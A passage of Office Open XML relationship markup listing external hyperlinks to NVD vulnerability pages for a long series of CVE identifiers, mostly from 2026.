Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82092" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82095" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82097" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82098" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82099" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84889" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85228" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85677" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87585" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37267" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-50997" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58374" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10143" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16174" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18608" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3505" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40192" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41674" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44494" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45115" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45116" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47683" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47879" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48006" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48026" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49478" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54347" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54722" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54729" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55100" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59643" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61556" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62243" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67195" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68494" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68899" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69096" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69220" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69249" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71491" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72870" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72884" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73413" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74787" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75840" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75915" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76224" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77357" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79707" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84202" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84304" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84694" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85155" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85610" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85687" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85786" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86169" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88874" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25990" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44492" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47727" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67340" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67608" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81213" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81889" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86185" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87794" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88056" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88060" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17107" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54606" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57485" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62246" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65986" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67609" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6958" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73233" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73248" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75858" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80112" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80378" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80436" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81207" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81540" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84226" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86095" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88886" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88889" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89049" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9854" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44901" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47764" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47781" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52491" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53091" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64657" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67986" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87811" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87813" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87814" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88022" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88890" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52769" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54100" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87524" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87616" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87618" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87644" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87648" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26007" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28498" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41604" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44487" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47719" TargetMode="External" Id="rId561" /><Relationship 